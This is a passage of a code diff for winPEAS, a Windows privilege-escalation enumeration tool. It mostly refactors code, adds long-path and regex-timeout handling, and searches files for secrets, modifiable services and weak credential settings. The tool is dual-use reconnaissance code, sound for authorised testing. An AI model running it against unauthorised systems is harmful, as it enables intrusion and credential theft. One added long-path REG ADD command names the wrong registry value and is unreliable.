-                PaintDisabledUsersNoAdministrator = Checks.PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
+                PaintDisabledUsersNoAdministrator = PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
             }
             catch (Exception ex)
             {
@@ -396,7 +411,7 @@ namespace winPEAS.Checks
             try
             {
                 if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
-                    System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    Console.WriteLine(@"ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
             }
             catch (Exception ex)
             {
@@ -404,6 +419,24 @@ namespace winPEAS.Checks
             }
         }
 
+        private static void CheckLongPath()
+        {
+            try
+            {
+                if (RegistryHelper.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\FileSystem", "LongPathsEnabled") != "1")
+                {
+                    Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    IsLongPath = false;
+                }
+                else
+                    IsLongPath = true;
+            }
+            catch (Exception ex)
+            {
+                Beaprint.GrayPrint("Error while checking LongPathsEnabled registry: " + ex);
+            }
+        }
+
         private static void WaitInput()
         {
             Console.Write("\n -- Press a key to continue... ");

winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs

@@ -1,5 +1,6 @@
 using System;
 using System.Collections.Generic;
+using System.Diagnostics;
 using System.IO;
 using System.Linq;
 using System.Text.RegularExpressions;
@@ -70,6 +71,9 @@ namespace winPEAS.Checks
 
         private static bool[] Search(List<CustomFileInfo> files, string fileName, FileSettings fileSettings, ref int resultsCount, string searchName, bool somethingFound)
         {
+            if (Checks.IsDebug)
+                Beaprint.PrintDebugLine($"Searching for {fileName}");
+
             bool isRegexSearch = fileName.Contains("*");
             bool isFolder = fileSettings.files != null;
             string pattern = string.Empty;
@@ -114,7 +118,8 @@ namespace winPEAS.Checks
 
                 if (isFileFound)
                 {
-                    if (!somethingFound) {
+                    if (!somethingFound)
+                    {
                         Beaprint.MainPrint($"Found {searchName} Files");
                         somethingFound = true;
                     }
@@ -139,6 +144,7 @@ namespace winPEAS.Checks
                 }
             }
 
+
             return new bool[] { false, somethingFound };
         }
 
@@ -149,15 +155,39 @@ namespace winPEAS.Checks
             try
             {
                 Regex rgx;
+                bool is_re_match = false;
+                try
+                {
+                    // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
                     if (caseinsensitive)
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
                         rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                    }
                     else
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
                         rgx = new Regex(regex_str.Trim());
+                    }
+                }
+                catch (RegexMatchTimeoutException e)
+                {
+                    if (Checks.IsDebug)
+                    {
+                        Beaprint.GrayPrint($"The regex {regex_str} had a timeout (ReDoS avoided but regex unchecked in a file)");
+                    }
+                    return foundMatches;
+                }
+
+                if (!is_re_match)
+                {
+                    return foundMatches;
+                }
 
                 int cont = 0;
                 foreach (Match match in rgx.Matches(text))
                 {
-                    if (cont > 4) break;
+                    if (cont > 10) break;
 
                     if (match.Value.Length < 400 && match.Value.Trim().Length > 2)
                         foundMatches.Add(match.Value);
@@ -232,7 +262,7 @@ namespace winPEAS.Checks
                     ".txt", ".text", ".md", ".markdown", ".toml", ".rtf",
 
                     // config
-                    ".conf", ".config", ".json", ".yml", ".yaml", ".xml", ".xaml", 
+                    ".cnf", ".conf", ".config", ".json", ".yml", ".yaml", ".xml", ".xaml", 
 
                     // dev
                     ".py", ".js", ".html", ".c", ".cpp", ".pl", ".rb", ".smali", ".java", ".php", ".bat", ".ps1",
@@ -246,11 +276,30 @@ namespace winPEAS.Checks
                     "eula.rtf", "changelog.md"
                 };
 
-                // No dirs, less thatn 1MB, only interesting extensions and not false positives files.
+                if (Checks.IsDebug)
-                var files = InitializeFileSearch(Checks.SearchProgramFiles).Where(f => !f.IsDirectory && valid_extensions.Contains(f.Extension.ToLower()) && !invalid_names.Contains(f.Filename.ToLower()) && f.Size > 0 && f.Size < 1000000).ToList();
+                    Beaprint.PrintDebugLine("Looking for secrets inside files via regexes");
+
+                // No dirs, less than 1MB, only interesting extensions and not false positives files.
+                var files = InitializeFileSearch(Checks.SearchProgramFiles).Where(f => !f.IsDirectory && valid_extensions.Contains(f.Extension.ToLower()) && !invalid_names.Contains(f.Filename.ToLower()) && f.Size > 0 && f.Size < Checks.MaxRegexFileSize).ToList();
                 var config = Checks.RegexesYamlConfig; // Get yaml info
                 Dictionary<string, Dictionary<string, Dictionary<string, List<string>>>> foundRegexes = new Dictionary<string, Dictionary<string, Dictionary<string, List<string>>>> { };
 
+                if (Checks.IsDebug)
+                {
+                    Beaprint.PrintDebugLine($"Searching regexes in {files.Count} files");
+                    valid_extensions.ForEach(ext =>
+                    {
+                        int cont = 0;
+                        files.ForEach(f =>
+                        {
+                            if (f.Extension.ToLower() == ext.ToLower())
+                                cont++;
+                        });
+                        Beaprint.PrintDebugLine($"Found {cont} files with ext {ext}");
+                    });
+
+                }
+
                 /*
                  * Useful for debbugging purposes to see the common file extensions found
                 Dictionary <string, int> dict_str = new Dictionary<string, int>();
@@ -283,8 +332,7 @@ namespace winPEAS.Checks
 
                         Parallel.ForEach(files, new ParallelOptions { MaxDegreeOfParallelism = num_threads }, f =>
                         {
-                        //foreach (var f in files)
+
-                        //{
                             foreach (var regex_obj in config.regular_expresions)
                             {
                                 foreach (var regex in regex_obj.regexes)
@@ -296,9 +344,16 @@ namespace winPEAS.Checks
 
                                     List<string> results = new List<string> { };
 
+                                    var timer = new Stopwatch();
+                                    if (Checks.IsDebug)
+                                    {
+                                        timer.Start();
+                                    }
+
+
                                     try
                                     {
-                                        string text = System.IO.File.ReadAllText(f.FullPath);
+                                        string text = File.ReadAllText(f.FullPath);
 
                                         results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
                                         if (results.Count > 0)
@@ -313,12 +368,20 @@ namespace winPEAS.Checks
                                     {
                                         // Cannot read the file
                                     }
+
+                                    if (Checks.IsDebug)
+                                    {
+                                        timer.Stop();
+
+                                        TimeSpan timeTaken = timer.Elapsed;
+                                        if (timeTaken.TotalMilliseconds > 20000)
+                                            Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
+                                    }
                                 }
                             }
                             pb += (double)100 / files.Count;
                             progress.Report(pb / 100); //Value must be in [0..1] range
                         });
-                        //}
                     }, Checks.IsDebug);
                 }
 
@@ -398,8 +461,10 @@ namespace winPEAS.Checks
 
             if (fileSettings.type == "f")
             {
-                var colors = new Dictionary<string, string>();
+                var colors = new Dictionary<string, string>
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                 Beaprint.AnsiPrint($"File: {fileInfo.FullPath}", colors);
 
                 if (!(bool)fileSettings.just_list_file)
@@ -409,8 +474,10 @@ namespace winPEAS.Checks
             }
             else if (fileSettings.type == "d")
             {
-                var colors = new Dictionary<string, string>();
+                var colors = new Dictionary<string, string>
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                 Beaprint.AnsiPrint($"Folder: {fileInfo.FullPath}", colors);
 
                 // just list the directory

winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs

@@ -159,7 +159,7 @@ namespace winPEAS.Checks
                     {
                         string formString = "    {0} ({1})\n    Accessed:{2} -- Size:{3}";
                         Beaprint.BadPrint(string.Format(formString, cc["file"], cc["Description"], cc["Accessed"], cc["Size"]));
-                        System.Console.WriteLine("");
+                        Console.WriteLine("");
                     }
                 }
                 else
@@ -182,7 +182,7 @@ namespace winPEAS.Checks
                 {
                     List<string> pwds = Unattended.ExtractUnattendedPwd(path);
                     Beaprint.BadPrint("    " + path);
-                    System.Console.WriteLine(string.Join("\n", pwds));
+                    Console.WriteLine(string.Join("\n", pwds));
                 }
             }
             catch (Exception ex)
@@ -480,7 +480,7 @@ namespace winPEAS.Checks
                         if (Regex.Match(rec_file["Name"], pattern.Replace("*", ".*"), RegexOptions.IgnoreCase).Success)
                         {
                             Beaprint.DictPrint(rec_file, colorF, true);
-                            System.Console.WriteLine();
+                            Console.WriteLine();
                         }
                     }
                 }

winPEAS/winPEASexe/winPEAS/Checks/NetworkInfo.cs

@@ -81,7 +81,7 @@ namespace winPEAS.Checks
                 {
                     if (line.Length > 0 && line[0] != '#')
                     {
-                        System.Console.WriteLine("    " + line.Replace("\t", "    "));
+                        Console.WriteLine("    " + line.Replace("\t", "    "));
                     }
                 }
             }
@@ -304,8 +304,8 @@ namespace winPEAS.Checks
                 Beaprint.GrayPrint("    DENY rules:");
                 foreach (Dictionary<string, string> rule in Firewall.GetFirewallRules())
                 {
-                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
+                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], Checks.CurrentUserSiDs));
-                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
+                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], Checks.CurrentUserSiDs));
                     string formString = "    ({0}){1}[{2}]: {3} {4} {5} from {6} --> {7}";
                     if (filePerms.Length > 0)
                         formString += "\n    File Permissions: {8}";

winPEAS/winPEASexe/winPEAS/Checks/ServicesInfo.cs

@@ -20,7 +20,7 @@ namespace winPEAS.Checks
             {
                 CheckRunner.Run(() =>
                 {
-                    modifiableServices = ServicesInfoHelper.GetModifiableServices(winPEAS.Checks.Checks.CurrentUserSiDs);
+                    modifiableServices = ServicesInfoHelper.GetModifiableServices(Checks.CurrentUserSiDs);
                 }, isDebug);
             }
             catch (Exception ex)
@@ -53,12 +53,12 @@ namespace winPEAS.Checks
 
                 foreach (Dictionary<string, string> serviceInfo in services_info)
                 {
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], Checks.CurrentUserSiDs);
                     List<string> dirRights = new List<string>();
 
                     if (serviceInfo["FilteredPath"] != null && serviceInfo["FilteredPath"] != "")
                     {
-                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), winPEAS.Checks.Checks.CurrentUserSiDs);
+                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), Checks.CurrentUserSiDs);
                     }
 
                     bool noQuotesAndSpace = MyUtils.CheckQuoteAndSpace(serviceInfo["PathName"]);
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Looking if you can modify any service registry");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions", "Check if you can modify the registry of a service");
-                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(Checks.CurrentUserSiDs);
 
                 Dictionary<string, string> colorsWR = new Dictionary<string, string>()
                             {

winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs

@@ -5,21 +5,21 @@ using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
+using winPEAS._3rdParty.Watson;
 using winPEAS.Helpers;
 using winPEAS.Helpers.AppLocker;
-using winPEAS._3rdParty.Watson;
-using winPEAS.Info.SystemInfo.Printers;
-using winPEAS.Info.SystemInfo.NamedPipes;
-using winPEAS.Info.SystemInfo;
-using winPEAS.Info.SystemInfo.SysMon;
 using winPEAS.Helpers.Extensions;
 using winPEAS.Helpers.Registry;
+using winPEAS.Info.SystemInfo;
 using winPEAS.Info.SystemInfo.AuditPolicies;
 using winPEAS.Info.SystemInfo.DotNet;
 using winPEAS.Info.SystemInfo.GroupPolicy;
-using winPEAS.Info.SystemInfo.WindowsDefender;
+using winPEAS.Info.SystemInfo.NamedPipes;
-using winPEAS.Info.SystemInfo.PowerShell;
 using winPEAS.Info.SystemInfo.Ntlm;
+using winPEAS.Info.SystemInfo.PowerShell;
+using winPEAS.Info.SystemInfo.Printers;
+using winPEAS.Info.SystemInfo.SysMon;
+using winPEAS.Info.SystemInfo.WindowsDefender;
 using winPEAS.Native.Enums;
 
 namespace winPEAS.Checks
@@ -107,7 +107,7 @@ namespace winPEAS.Checks
                     { Globals.StrTrue, Beaprint.ansi_color_bad },
                 };
                 Beaprint.DictPrint(basicDictSystem, colorsSI, false);
-                System.Console.WriteLine();
+                Console.WriteLine();
                 Watson.FindVulns();
 
                 //To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
@@ -369,12 +369,12 @@ namespace winPEAS.Checks
 
             if (lsaCfgFlags == "1")
             {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                 Beaprint.GoodPrint("    CredentialGuard is active with UEFI lock");
             }
             else if (lsaCfgFlags == "2")
             {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                 Beaprint.GoodPrint("    CredentialGuard is active without UEFI lock");
             }
             else
@@ -572,7 +572,7 @@ namespace winPEAS.Checks
                     else if (using_HKLM_WSUS == "0")
                         Beaprint.GoodPrint("    But UseWUServer is equals to 0, so it is not vulnerable!");
                     else
-                        System.Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
+                        Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
                 }
                 else
                 {
@@ -1070,7 +1070,7 @@ namespace winPEAS.Checks
                         }
                         else if (kvp.Value.GetType().IsArray && (kvp.Value.GetType().GetElementType().ToString() == "System.Byte"))
                         {
-                            val = System.BitConverter.ToString((byte[])kvp.Value);
+                            val = BitConverter.ToString((byte[])kvp.Value);
                         }
                         else
                         {
@@ -1086,12 +1086,12 @@ namespace winPEAS.Checks
                             Beaprint.BadPrint("    [!]      WDigest is enabled - plaintext password extraction is possible!");
                         }
 
-                        if (key.Equals("RunAsPPL", System.StringComparison.InvariantCultureIgnoreCase) && val == "1")
+                        if (key.Equals("RunAsPPL", StringComparison.InvariantCultureIgnoreCase) && val == "1")
                         {
                             Beaprint.BadPrint("    [!]      LSASS Protected Mode is enabled! You will not be able to access lsass.exe's memory easily.");
                         }
 
-                        if (key.Equals("DisableRestrictedAdmin", System.StringComparison.InvariantCultureIgnoreCase) && val == "0")
+                        if (key.Equals("DisableRestrictedAdmin", StringComparison.InvariantCultureIgnoreCase) && val == "0")
                         {
                             Beaprint.BadPrint("    [!]      RDP Restricted Admin Mode is enabled! You can use pass-the-hash to access RDP on this system.");
                         }

winPEAS/winPEASexe/winPEAS/Checks/UserInfo.cs

@@ -1,8 +1,6 @@
 using System;
 using System.Collections.Generic;
-using System.ComponentModel;
 using System.Runtime.InteropServices;
-using System.Security.Cryptography;
 using System.Security.Principal;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Extensions;
@@ -158,7 +156,7 @@ namespace winPEAS.Checks
             try
             {
                 Beaprint.MainPrint("RDP Sessions");
-                List<Dictionary<string, string>> rdp_sessions = Info.UserInfo.UserInfoHelper.GetRDPSessions();
+                List<Dictionary<string, string>> rdp_sessions = UserInfoHelper.GetRDPSessions();
                 if (rdp_sessions.Count > 0)
                 {
                     string format = "    {0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}";
@@ -263,7 +261,7 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Password Policies");
                 Beaprint.LinkPrint("", "Check for a possible brute-force");
-                List<Dictionary<string, string>> PPy = Info.UserInfo.UserInfoHelper.GetPasswordPolicy();
+                List<Dictionary<string, string>> PPy = UserInfoHelper.GetPasswordPolicy();
                 Beaprint.DictPrint(PPy, ColorsU(), false);
             }
             catch (Exception ex)

winPEAS/winPEASexe/winPEAS/Helpers/AppLocker/AppLockerHelper.cs

@@ -327,6 +327,8 @@ namespace winPEAS.Helpers.AppLocker
             if (depth == FolderCheckMaxDepth) return false;
 
             try
+            {
+                if (Directory.Exists(path))
                 {
                     var subfolders = Directory.EnumerateDirectories(path);
                     var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
@@ -363,6 +365,7 @@ namespace winPEAS.Helpers.AppLocker
                         return true;
                     }
                 }
+            }
             catch (Exception)
             {
             }

winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs

@@ -1,7 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.Text.RegularExpressions;
-using System.Threading;
 
 namespace winPEAS.Helpers
 {
@@ -105,7 +104,7 @@ namespace winPEAS.Helpers
 
             PrintLegend();
             Console.WriteLine();
-            LinkPrint("https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation", "You can find a Windows local PE Checklist here:");
+            Console.WriteLine(BLUE + " You can find a Windows local PE Checklist here: " + YELLOW + "https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation");
         }
 
         static void PrintLegend()
@@ -122,29 +121,31 @@ namespace winPEAS.Helpers
         public static void PrintUsage()
         {
             Console.WriteLine(YELLOW + "  [*] " + GREEN + "WinPEAS is a binary to enumerate possible paths to escalate privileges locally" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        domain" + GRAY + "               Enumerate domain information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        domain" + GRAY + "               Enumerate domain information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        systeminfo" + GRAY + "           Search system information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        systeminfo" + GRAY + "           Search system information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        userinfo" + GRAY + "             Search user information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        userinfo" + GRAY + "             Search user information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        processinfo" + GRAY + "          Search processes information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        processinfo" + GRAY + "          Search processes information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        servicesinfo" + GRAY + "         Search services information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        servicesinfo" + GRAY + "         Search services information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        applicationsinfo" + GRAY + "     Search installed applications information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        applicationsinfo" + GRAY + "     Search installed applications information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        networkinfo" + GRAY + "          Search network information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        networkinfo" + GRAY + "          Search network information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        windowscreds" + GRAY + "         Search windows credentials" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        windowscreds" + GRAY + "         Search windows credentials" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        browserinfo" + GRAY + "          Search browser information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        browserinfo" + GRAY + "          Search browser information" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        filesinfo" + GRAY + "            Search generic files that can contains credentials" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        filesinfo" + GRAY + "            Search generic files that can contains credentials" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        fileanalysis" + GRAY + "         Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        fileanalysis" + GRAY + "         Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        eventsinfo" + GRAY + "           Display interesting events information" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        eventsinfo" + GRAY + "           Display interesting events information" + NOCOLOR);
             Console.WriteLine();
-            Console.WriteLine(LBLUE + "        quiet" + GRAY + "                Do not print banner" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        quiet" + GRAY + "                Do not print banner" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        notcolor" + GRAY + "             Don't use ansi colors (all white)" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        notcolor" + GRAY + "             Don't use ansi colors (all white)" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        searchpf" + GRAY + "             Search credentials via regex also in Program Files folders" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        searchpf" + GRAY + "             Search credentials via regex also in Program Files folders" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        wait" + GRAY + "                 Wait for user input between checks" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        wait" + GRAY + "                 Wait for user input between checks" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        debug" + GRAY + "                Display debugging information - memory usage, method execution time" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        debug" + GRAY + "                Display debugging information - memory usage, method execution time" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        log[=logfile]" + GRAY + $"        Log all output to file defined as logfile, or to \"{Checks.Checks.DefaultLogFile}\" if not specified" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        log[=logfile]" + GRAY + $"        Log all output to file defined as logfile, or to \"{Checks.Checks.DefaultLogFile}\" if not specified" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        max-regex-file-size=1000000" + GRAY + $"        Max file size (in Bytes) to search regex in. Default: {Checks.Checks.MaxRegexFileSize}B" + NOCOLOR);
+
             Console.WriteLine();
-            Console.WriteLine(LCYAN + "        Additional checks (slower):");
+            Console.WriteLine(GREEN + "        Additional checks (slower):");
-            Console.WriteLine(LBLUE + "        -lolbas" + GRAY + $"              Run additional LOLBAS check" + NOCOLOR);
+            Console.WriteLine(LCYAN + "        -lolbas" + GRAY + $"              Run additional LOLBAS check" + NOCOLOR);
-            Console.WriteLine(LBLUE + "        -linpeas=[url]" + GRAY + $"       Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
+            Console.WriteLine(LCYAN + "        -linpeas=[url]" + GRAY + $"       Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
                                      $"                             (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
 
         }
@@ -213,9 +214,18 @@ namespace winPEAS.Helpers
             Console.WriteLine(DGRAY + to_print + NOCOLOR);
         }
 
+        public static void LongPathWarning(string path)
+        {
+            if (!Checks.Checks.WarningIsLongPath)
+            {
+                GrayPrint($"The path {path} is too large, try to enable LongPaths in the registry (no more warning about this will be shown)");
+                Checks.Checks.WarningIsLongPath = true;
+            }
+        }
+
         internal static void PrintDebugLine(string log)
         {
-            Console.WriteLine(YELLOW + "  [Debug]  " + log + NOCOLOR);
+            Console.WriteLine(DGRAY + "  [Debug]  " + log + NOCOLOR);
             Console.WriteLine();
         }
 

winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/Credential.cs

@@ -4,7 +4,6 @@ using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.Permissions;
-using System.Text;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 

winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/NativeMethods.cs

@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32.SafeHandles;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Linq;
 using System.Runtime.InteropServices;
-using Microsoft.Win32.SafeHandles;
 using winPEAS.Native;
 
 namespace winPEAS.Helpers.CredentialManager

winPEAS/winPEASexe/winPEAS/Helpers/DomainHelper.cs

@@ -1,5 +1,4 @@
 using System;
-using System.Runtime.InteropServices;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 

winPEAS/winPEASexe/winPEAS/Helpers/HandlesHelper.cs

@@ -1,11 +1,9 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.Helpers
 {
@@ -438,9 +436,11 @@ namespace winPEAS.Helpers
         // Get the owner of a process given the PID
         public static Dictionary<string, string> GetProcU(Process p)
         {
-            Dictionary<string, string> data = new Dictionary<string, string>();
+            Dictionary<string, string> data = new Dictionary<string, string>
-            data["name"] = "";
+            {
-            data["sid"] = "";
+                ["name"] = "",
+                ["sid"] = ""
+            };
             IntPtr pHandle = IntPtr.Zero;
             try
             {
@@ -586,7 +586,7 @@ namespace winPEAS.Helpers
             { // This shouldn't be needed
                 if (path.StartsWith("\\"))
                     path = path.Substring(1);
-                hive = Helpers.Registry.RegistryHelper.CheckIfExists(path);
+                hive = Registry.RegistryHelper.CheckIfExists(path);
             }
 
             if (path.StartsWith("\\"))

winPEAS/winPEASexe/winPEAS/Helpers/MemoryHelper.cs

@@ -1,5 +1,4 @@
-using System;
+using System.Diagnostics;
-using System.Diagnostics;
 
 namespace winPEAS.Helpers
 {

winPEAS/winPEASexe/winPEAS/Helpers/PermissionsHelper.cs

@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Security.AccessControl;
 using System.Security.Principal;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 
 namespace winPEAS.Helpers
 {
@@ -353,6 +353,8 @@ namespace winPEAS.Helpers
             {
                 results[path] = String.Join(", ", GetPermissionsFolder(path, Checks.Checks.CurrentUserSiDs));
                 if (string.IsNullOrEmpty(results[path]))
+                {
+                    if (Directory.Exists(path))
                     {
                         foreach (string d in Directory.EnumerateDirectories(path))
                         {
@@ -365,6 +367,7 @@ namespace winPEAS.Helpers
                         }
                     }
                 }
+            }
             catch
             {
                 //Access denied to a path

winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs

@@ -1,7 +1,7 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Linq;
-using Microsoft.Win32;
 
 namespace winPEAS.Helpers.Registry
 {
@@ -177,7 +177,7 @@ namespace winPEAS.Helpers.Registry
 
         internal static uint? GetDwordValue(string hive, string key, string val)
         {
-            string strValue = RegistryHelper.GetRegValue(hive, key, val);
+            string strValue = GetRegValue(hive, key, val);
 
             if (uint.TryParse(strValue, out uint res))
             {

winPEAS/winPEASexe/winPEAS/Helpers/Search/SearchHelper.cs

@@ -76,7 +76,7 @@ namespace winPEAS.Helpers.Search
                             if (!StaticExtensions.Contains(f.Extension.ToLower()))
                             {
                                 // It should always be lesss than 260, but some times it isn't so this will bypass that file
-                                if (f.FullName.Length <= 260)
+                                if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
                                 {
                                     CustomFileInfo file_info = new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false);
                                     files.Add(file_info);
@@ -88,6 +88,8 @@ namespace winPEAS.Helpers.Search
                                         files.Add(file_dir);
                                     }
                                 }
+                                else if (f.FullName.Length > 260)
+                                    Beaprint.LongPathWarning(f.FullName);
                             }
                         }
                         );
@@ -169,14 +171,24 @@ namespace winPEAS.Helpers.Search
                     {
                         foreach (var directory in directories)
                         {
+                            if (Checks.Checks.IsLongPath || directory.FullName.Length <= 260)
                                 files.Add(new CustomFileInfo(directory.Name, null, directory.FullName, 0, true));
+
+                            else if (directory.FullName.Length > 260)
+                                Beaprint.LongPathWarning(directory.FullName);
                         }
                     }
 
                     foreach (var f in dirInfo.GetFiles(pattern))
                     {
                         if (!StaticExtensions.Contains(f.Extension.ToLower()))
+                        {
+                            if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
                                 files.Add(new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false));
+
+                            else if (f.FullName.Length > 260)
+                                Beaprint.LongPathWarning(f.FullName);
+                        }
                     }
 
                     if (directories.Length > 1) return new List<DirectoryInfo>(directories);
@@ -209,43 +221,43 @@ namespace winPEAS.Helpers.Search
         {
             // c:\users
             string rootUsersSearchPath = $"{SystemDrive}\\Users\\";
-            SearchHelper.RootDirUsers = SearchHelper.GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirUsers = GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
 
             // c:\users\current_user
             string rootCurrentUserSearchPath = Environment.GetEnvironmentVariable("USERPROFILE");
